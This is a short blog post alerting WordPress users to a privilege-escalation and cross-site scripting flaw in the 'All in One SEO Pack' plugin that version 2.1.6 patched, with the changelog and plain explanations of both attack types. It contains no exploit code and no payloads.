For all wordpress blog owners who use “All in One SEO Pack” plugin for search engine optimization needs to be aware of this. Popular Blog Sucuri released a post indicating vulnerability in popular SEO plugin “All in One SEO Pack.”
Security Flaws present in All in One SEO Pack plugin
The plugin code will allow hackers to
- Trigger privilege escalation.
- issue cross site scripting (XSS) attacks on wordpress blogs.
Although the plugin users don’t need to worry as the plugin developer for All in One SEO Pack has addressed this issue and released an update. Plugin users whose versions are less than 2.1.6 are advised to get the update as soon as possible.
While looking at change log of “All in One SEO Pack” for version 2.1.6,
- Google Settings – Improved Google Analytics code for tracking outbound links
- Google Settings – New option for Anonymize IP addresses for Google Analytics
- XML Sitemap Module – New controls for setting the frequency and priority of individual post types
- XML Sitemap Module – New controls for setting the frequency and priority of individual taxonomies
- XML Sitemap Module – Additional integration with SimplePress
- Social Meta Module – New option for setting the Twitter Card Type
- Added integration with the Advanced Custom Fields plugin so that you can use ACF fields in titles and descriptions
- Live preview snippet on the Edit Post screen now displays the Site Title
- Security patch for vulnerabilities which might trigger privilege escalation and cross site scripting issues on WordPress administration panel reported by Sucuri (props to Marc at Sucuri)
- Bug fixes for issues reported by users in the support forums
The change log (part indicated in red colour) clearly indicates the issue. Users need not worry as still “All in One SEO Pack” is among the top wordpress SEO plugins.
Coming onto issues, privilege escalation and cross site attacks, here is the explanation.
In this process a bug present in the application is exploited to gain elevated access to the application. For example, a normal user of an application gaining administrative privileges.
For wordpress, as reported by Sucuri Blog, the bug present in the “All in One SEO Pack” plugin code also elevates the privileges. Using this bug, a logged-in user (who is not having administrative privilege) could add or modify some of the parameters used by the plugin. These parameters are SEO title, keywords, tags. Thus, using this bug one can decrease the blog’s ranking on Search engines by modifing the post title, keyword and tags.
Cross Site Scripting (XSS) Attacks
In this attack, attacker injects a client-side script into the web-page. The motive of injecting is to bypass the access controls of the website.
Meanwhile, wordpress users always needs to be aware of security flaws and plugin vulnerabilities. Technoxpad recommends wordpress users to always keep their wordpress blogs updated, that includes, themes, plugins and wordpress itself.
Tags: wordpress plugins